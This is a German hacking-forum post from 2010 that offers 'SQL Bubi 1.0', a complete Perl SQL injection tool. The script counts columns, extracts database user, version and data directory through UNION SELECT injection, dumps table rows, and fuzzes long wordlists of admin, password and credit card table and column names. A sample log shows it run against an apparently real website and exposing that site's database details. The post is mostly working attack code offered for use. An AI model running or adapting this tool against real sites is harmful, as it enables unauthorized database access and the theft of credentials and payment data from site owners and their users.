Ergebnis 1 bis 6 von 6

Thema: SQL Bubi 1.0

Baum-Darstellung

  1. 13.06.2010, 15:16 #1
    fred777
    fred777 ist offline
    _fred_ Avatar von fred777
    Registriert seit
    20.08.2008
    Beiträge
    1.967

    Standard SQL Bubi 1.0

    Ich stelle euch hier ein schon etwas älteres Projekt von mir zur Verfügung. Da verschiedene SQL Injection Helper bei mir nicht besonders liefen, ganz abgesehen von Linux, habe ich mir selbst was dazu geschrieben.

    Etwas besonderes ist es nicht, einfach nur hilfreich und nicht so abgefuckt wie schemafuzz
    Funktionen sind in den Comments zu betrachten.

    Bubi ist geschrieben in Perl
    Zeilen gesamt -> ähm 310
    Auf Wunsch bastel ich noch Proxy- und Threadunterstützung rein

    Logfiles werden automatisch generiert und sollten alle wichtigen Informationen enthalten. Für Kritik und Codeverbesserungen bin ich offen

    Intro

    #!/usr/bin/perl
    #-------------------------------------------------------------------#
    # _ ___ _ ____
    # (_)/ _ \| | |___ \
    # _| | | | | __ __) |
    # | | | | | |/ /|__ <
    # | | |_| | < ___) |
    # | |\___/|_|\_\____/
    # _/ |
    # |__/ SQL Injection Helper 1.0
    #
    #................................................. ...............
    #
    # + written by fred777
    # + (C) 2010 by j0k3 project
    # + fred777.5x.to
    #
    # .................................................. .............
    # DAMN INFORMATION SHIT
    #
    # + Column Counter
    # + SQL Data Grabber
    # + Name Information Fuzzer
    #
    # - Column Counter
    # - $ perl sql.pl -c <page> <true-word>
    # - $ perl sql.pl -c http://seite.de/?d=1 j0k3
    #
    # - SQL Data Grabber
    # - $ perl sql.pl -d <page>
    # - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,j0k3
    # - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,
    # j0k3(table_name1,name2)+from+table
    #
    # - Name Information Fuzzer
    # - $ perl sql.pl -f <page>
    # - $ perl sqlp.pl -f http://seite.de/?d=-1+union+select+1,j0k3
    #
    # .................................................. .............
    # DAMN GREETZ
    #
    # + back2hack, free-hack, creative-coding, scene-coderz, hackbase
    # + darkc0de for the n1 table list
    # + and teh leet happy ninjas of course
    #
    #-------------------------------------------------------------------#
    Logfile - Example:

    Code:
    +-------------------------------------------------------------+
|    j0k3 SQL Injection Helper - Logfile                      |
+-------------------------------------------------------------+

Columns:8
String: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,8--+

+-------------------------------------------------------------+
|    j0k3 SQL Injection Helper - Logfile                      |
+-------------------------------------------------------------+

Url: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,j0k3

User: leeger_zuckerm@localhost
MySQL Version: 5.0.90-community
Directory: /var/lib/mysql/

+-------------------------------------------------------------+
|    j0k3 SQL Injection Helper - Logfile                      |
+-------------------------------------------------------------+

Url: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,UNHEX(HEX(CONCAT_WS(0x3a,99999,table_name,column_name,99999)))+from+information_schema.columns

Dumping Information:

[0] CHARACTER_SETS:CHARACTER_SET_NAME
[1] CHARACTER_SETS:DEFAULT_COLLATE_NAME
[2] CHARACTER_SETS:DESCRIPTION
[3] CHARACTER_SETS:MAXLEN
[4] COLLATIONS:COLLATION_NAME
[5] COLLATIONS:CHARACTER_SET_NAME
[6] COLLATIONS:ID
[7] COLLATIONS:IS_DEFAULT
[8] COLLATIONS:IS_COMPILED
[9] COLLATIONS:SORTLEN
[10] COLLATION_CHARACTER_SET_APPLICABILITY:COLLATION_NAME
[11] COLLATION_CHARACTER_SET_APPLICABILITY:CHARACTER_SET_NAME
[12] COLUMNS:TABLE_CATALOG
[13] COLUMNS:TABLE_SCHEMA
[14] COLUMNS:TABLE_NAME

+-------------------------------------------------------------+
|    j0k3 SQL Injection Helper - Logfile                      |
+-------------------------------------------------------------+

Url: http://zuckermais.ch/index.php?id=18+and+1=0+union+select+1,2,3,4,5,6,7,j0k3

Scanning Tables:
+ information_schema.columns -> Scanning Columns:
- table_name
- column_name
    Script:

    Code:
    #!/usr/bin/perl
#-------------------------------------------------------------------#
#    _  ___  _    ____  
#   (_)/ _ \| |  |___ \ 
#    _| | | | | __ __) |
#   | | | | | |/ /|__ < 
#   | | |_| |   < ___) |
#   | |\___/|_|\_\____/
#  _/ |                 
# |__/  SQL Injection Helper 1.0 
#
#................................................................
#
#    + written by fred777
#    + (C) 2010 by j0k3 project
#    + fred777.5x.to
#
# ...............................................................
# DAMN INFORMATION SHIT
#
# + Column Counter
# + SQL Data Grabber
# + Name Information Fuzzer
#
# - Column Counter
# - $ perl sql.pl -c <page> <true-word>
# - $ perl sql.pl -c http://seite.de/?d=1 j0k3
#
# - SQL Data Grabber
# - $ perl sql.pl -d <page>
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,j0k3
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,
#                    j0k3(table_name1,name2)+from+table
#
# - Name Information Fuzzer
# - $ perl sql.pl -f <page>
# - $ perl sqlp.pl -f http://seite.de/?d=-1+union+select+1,j0k3
#
# ...............................................................
# DAMN GREETZ
#
# + back2hack, free-hack, creative-coding, scene-coderz, hackbase
# + darkc0de for the n1 table list
# + and teh leet happy ninjas of course :P
#
#-------------------------------------------------------------------#
use strict;
use warnings;
use LWP::UserAgent;

print q 
{
+-------------------------------------------------------------+
|                 SQL Injection Helper 1.0                    |
|                                                             |
|    + Column Counter                                         |
|    + SQL Data Grabber                                       |
|    + Name Information-Fuzzer                                |
|                                                             |
|                         < j0k3 >           (C) by fred777   |
+-------------------------------------------------------------+
}; $|++;
	
	our ($op,$url,$true) = @ARGV;
	our ($file,$lim)     = ('log.txt',1000);
	our $ua              = LWP::UserAgent->new();
	
	my $head =
	"+-------------------------------------------------------------+\n".
    "|    j0k3 SQL Injection Helper - Logfile                      |\n".
    "+-------------------------------------------------------------+\n";
	
	usage() unless $op   =~ m:^-d$|^-c$|^-f$:i;
	usage() unless $url  =~ m.^http://.;

	writing($head);
	
	order()   if($op eq '-c');
	selects() if($op eq '-d');
	fuzz()    if($op eq '-f');


sub order {

	error() if(!$true);
	my ($resp,$i,$str) = (0,0,"$url+AND+1=0+UNION+SELECT+1");
	
	do {
		$i++;
		$resp = $ua->get("$url+ORDER+BY+$i--+") or die "\n$!\n";			
	}   while($resp->content =~ m:$true:i);
	
	$str .= ",$_" for (2..$i-1);
	printf("\nColumns: %d\nString: %s\n",$i-1,"$str--+");
	writing("\nColumns:".($i-1)."\nString: $str--+\n\n");

}

sub selects {

	if($url =~ m:.+j0k3: && $url !~ m:.+from.+:) {
	
		my $inf  =  'UNHEX(HEX(CONCAT_WS(0x3a,99999,user(),version(),@@datadir,99999)))';
		my $st   =  replace($url,'j0k3',$inf);
		my $resp =  $ua->get("$st--+") or die "\n$!\n";	
		
		$resp->content    =~ m![9]{5}:(.+):(.+):(.+):[9]{5}!i;	
		my $t    =  "\nUrl: $url\n\nUser: $1\nMySQL Version: $2\nDirectory: $3\n\n";
		print $t;   writing($t);
	
	}
	
	elsif($url =~ m:.+from.+:i) {
	
		my ($c,$resp) = (0,0);
		$url    =~ m:j0k3\((.+)\):i;
		my $str =  "UNHEX(HEX(CONCAT_WS(0x3a,99999,$1,99999)))";
		my $st  =  replace($url,'j0k3\('.$1.'\)',$str);
		print      "\nDumping Information:\n\n"; writing("\nUrl: $st\n\nDumping Information:\n\n");
		
		do {
			$resp  =  $ua->get("$st+LIMIT+$c,$lim--+") or die "\n$!\n";
			$resp->content =~ m![9]{5}:(.*):[9]{5}!;
			print  "[$c] $1\n"; writing("[$c] $1\n");
			$c++;
		} while($resp->content =~ m![9]{5}:(.+):[9]{5}! && $resp->content !~ m:error:i);
	}
	
	else {	
		error();
	}
}

sub fuzz {

	my @tables =(
	'user','admin','users','admins','account','accounts','adm','admin_login', 
	'member','memberlist','members','login_admin','login_admins','login_user',
	'login_users','logins','logon','logs','admin_user','admin_userinfo','administer',
	'administrable','administrate','administration','administrator','administrators',
	'adminrights','adminuser','login','mambo_session','mambo_users','manage','Logins',
	'manager','mb_users','mybb_users','e107.e107_user','e107_user','Admins','Login',
	'phorum_users','phpads_clients','phpads_config','phpbb_users','phpBB2.forum_users',
	'tbladmins','sort','_wfspro_admin','4images_users','a_admin','art','article_admin', 
	'articles','artikel','aut','author','autore','backend','backend_users','backenduser', 
	'chat_config','chat_messages','chat_users','client','clients','clubconfig',
	'company','config','contact','contacts','content', 'control','cpg_config', 
	'cpg132_users','customer','customers','customers_basket','dbadmins','dealer', 
	'dealers','diary','download','forum.ibf_members','fusion_user_groups',
	'fusion_users','group','groups','ibf_admin_sessions','ibf_conf_settings',
	'ibf_members','ibf_members_converge','ibf_sessions','icq','images','index',
	'info','ipb.ibf_members','ipb_sessions','joomla_users','jos_blastchatc_users',
	'jos_comprofiler_members','jos_contact_details','jos_joomblog_users',
	'jos_messages_cfg','jos_moschat_users','jos_users','knews_lostpass','korisnici',
	'kpro_adminlogs','kpro_user','links','lost_pass','lost_passwords','movie','movies',
	'lostpass','lostpasswords','m_admin','main','minibbtable_users','mitglieder',
	'mysql','mysql.user','name','names','news','news_lostpass','newsletter', 
	'nuke_authors','nuke_bbconfig','nuke_config','nuke_popsettings','nuke_users',
	'obb_profiles','order','orders','parol','partner','partners','passes','password',
	'passwords','perdorues','perdoruesit','phorum_session','phorum_user',
	'phpBB2.phpbb_users','phpmyadmin.pma_table_info','pma_table_info','poll_user',
	'punbb_users','pwd','pwds','reg_user','reg_users','registered','reguser','regusers', 
	'session','sessions','settings','shop.cards','shop.orders','site_login', 
	'site_logins','sitelogin','sitelogins','sites','smallnuke_members','smf_members',
	'SS_orders','statistics','superuser','sysadmin','sysadmins','system','sysuser', 
	'sysusers','table','tables','tb_admin','tb_administrator','tb_login','tb_member',
	'tb_members','tb_user','tb_username','tb_usernames','tb_users','tbl','tbl_user',
	'tbl_users','tbluser','tbl_clients','tbl_client','tblclients','tblclient','test',
	'usebb_members','user_admin','user_info','user_list','user_login','user_logins',
	'user_names','usercontrol','userinfo','userlist','userlogins','username','usernames',
	'userrights','users','vb_user','vbulletin_session','vbulletin_user','voodoo_members',
	'webadmin','webadmins','webmaster','webmasters','webuser','webusers','x_admin',
	'xoops_bannerclient','xoops_users','yabb_settings','yabbse_settings','ActiveDataFeed',
	'Category','CategoryGroup','ChicksPass','ClickTrack','Country','CountryCodes1',
	'DataFeedShowtag1','DataFeedShowtag2','DataFeedShowtag2_incoming','dtproperties', 
	'Event','Event_backup','Event_Category','EventRedirect','Events_new','Genre', 
	'JamPass','MyTicketek','MyTicketekArchive','News','Promotion','Region',
	'SearchOptions','Series','Sheldonshows','StateList','States','SubCategory',
	'Subjects','Survey','SurveyAnswer','SurveyAnswerOpen','SurveyQuestion','SurveyRespondent', 
	'sysconstraints','syssegments','tblRestrictedPasswords','tblRestrictedShows',
	'Ticket System Acc Numbers','TimeDiff','Titles','Total Members','UserPreferences',
	'uvw_Category','uvw_Preferences','Venue','venues','VenuesNew','stone list',
	'tblArtistCategory','tblArtists','tblConfigs','tblLayouts','tblLogBookAuthor',
	'tblLogBookImages','tblLogBookImport','tblLogBookUser','tblMails','tblNewCategory',
	'tblNews','tblOrders','tblStoneCategory','tblStones','tblUser','tblWishList', 
	'viewLogBookEntry','viewStoneArtist','vwListAllAvailable','CC_info', 
	'CC_username','cms_user','cms_users','cms_admin','cms_admins','user_name',
	'jos_user','table_user','email','mail','bulletin','cc_info','login_name', 
	'admuserinfo','userlistuser_list','SiteLogin','Site_Login','UserAdmin', 
	);
	
	my @columns = (
	'user','name','username','password','passwd','pass','benutzername','passwort',
	'cc_number','id','email','pwd','user_name','customers_email_address',
	'customers_password','user_password','user_pass','admin_user','admin_password',
	'admin_pass','usern','user_n','username1','password1','email1','id1',
	'users','login','logins','login_user','login_admin','login_username','user_username', 
	'user_login','auid','apwd','adminid','admin_id','adminuser','adminuserid',
	'admin_userid','adminusername','admin_username','adminname','admin_name',
	'usr','usr_n','usrname','usr_name','usrpass','usr_pass','usrnam','nc','uid',
	'userid','user_id','myusername','mail','emni','logohu','punonjes','kpro_user',
	'wp_users','emniplote','perdoruesi','perdorimi','punetoret','logini','llogaria', 
	'kodi','emer','ime','korisnik','korisnici','user1','administrator','text',
	'administrator_name','mem_login','login_password','login_pass','login_passwd',
	'login_pwd','sifra','lozinka','psw','pass1word','pass_word','passw','pass_w',
	'user_passwd','userpass','userpassword','userpwd','user_pwd','useradmin',
	'user_admin','mypassword','passwrd','admin_pwd','admin_passwd','mem_password', 
	'memlogin','e_mail','usrn','u_name','uname','mempassword','mem_pass', 
	'mem_passwd','mem_pwd','p_word','pword','p_assword','myname','my_username',
	'my_name','my_password','my_email','cvvnumber','about','access','accnt',
	'accnts','account','accounts','admin','adminemail','adminlogin','adminmail',
	'admins','aid','aim','auth','authenticate','authentication','blog','cc_expires',
	'cc_owner','cc_type','cfg','cid','clientname','clientpassword','clientusername',
	'conf','config','contact','converge_pass_hash','converge_pass_salt','crack', 
	'customer','customers','cvvnumber]','data','db_database_name','db_hostname', 
	'db_password','db_username','download','e-mail','emailaddress','full','gid',
	'group','group_name','hash','hashsalt','homepage','icq','icq_number','id_group',
	'id_member','images','index','ip_address','last_ip','last_login','lastname',
	'log','login_name','login_pw','loginkey','loginout','logo','md5hash','member', 
	'member_id','member_login_key','member_name','memberid','membername','members',
	'new','news','nick','number','nummer','pass_hash','passwordsalt','passwort', 
	'personal_key','phone','privacy','pw','pwrd','salt','search','secretanswer',
	'secretquestion','serial','session_member_id','session_member_login_key','sesskey', 
	'setting','sid','spacer','status','store','store1','store2','store3','store4',
	'table_prefix','temp_pass','temp_password','temppass','temppasword','text','un',
	'user_email','user_icq','user_ip','user_level','user_passw','user_pw','user_pword',
	'user_pwrd','user_un','user_uname','user_usernm','user_usernun','user_usrnm', 
	'userip','userlogin','usernm','userpw','usr2','usrnm','usrs','warez','xar_name',
	'xar_pass');
	
	print "\nUrl: $url\n"; writing("\nUrl: $url\n");
	print "\nScanning Tables:\n"; writing("\nScanning Tables:\n");
	
	foreach my $tab (@tables) {
	
		my $re   = replace($url,'j0k3',9x5);
		my $resp = $ua->get("$re+FROM+$tab--+");
		
		if($resp->content =~ m:[^,][9]{5}: && $resp->content !~ m:error:i) {
			print "+ $tab -> Scanning Columns:\n";
			writing("+ $tab -> Scanning Columns:\n");
			
			foreach my $col (@columns) {
				$re   = replace($url,'j0k3',"CONCAT(99999,0x3a,$col)");
				$resp = $ua->get("$re+FROM+$tab+LIMIT+0,1--+");
				
				if($resp->content =~ m:[^(][9]{5}: && $resp->content !~ m:error:i) {
					print "- $col\n"; writing("- $col\n");
				}
			}
		}
		
	}
		
}

sub replace {

	my ($str,$or,$re) = @_;
	$str =~ s/$or/$re/;
	return $str;

}

sub writing {

		
	my $text = shift;
	open  FL,">>$file" or die "\n$!\n";
	print FL $text;
	close FL;

}

sub error {

	print "+-------------------------------------------------------------+\n".
		  "|    Error:  Read Usage! - \$ perl sql.pl                      |\n".
		  "+-------------------------------------------------------------+\n"; exit;
	
}

sub usage {

print q {
+-------------------------------------------------------------+
|   INFORMATION                                               |
+-------------------------------------------------------------+
|                                                             |
|   Column Counter:                                           |
|   $ perl sql.pl -c <url> <true-word>                        |
|   $ perl sql.pl -c http://seite.de/?id=7 j0k3               |
|                                                             |
|   SQL Data Grabber:                                         |
|   $ perl sql.pl -d <url>                                    |
|   $ perl sql.pl -d http://seite.de/?id=-7+union+select      |
|                    +1,j0k3                                  |
|   $ perl sql.pl -d http://seite.de/?id=-7+union+select+1,   |
|                    j0ke(column1,column2)+from+table         |
|                                                             |
|   Name Information Fuzzer:                                  |
|   $perl sql.pl -f <url>                                     |
|   $perl sql.pl -f http://seite.de/?id=-7+union+select       |
|                   +1,j0k3                                   |
|                                                             |
|                        < j0k3 >                             |
+-------------------------------------------------------------+
}; exit;
}
# EOF - < j0k3 > - > 06.2010 - version 1.0
    Geändert von fred777 (13.06.2010 um 22:37 Uhr)
    _n0p3_
    Zitieren Zitieren

  2. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    moppelito (13.06.2010)
« Vorheriges Thema | Nächstes Thema »

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  

Foren-Regeln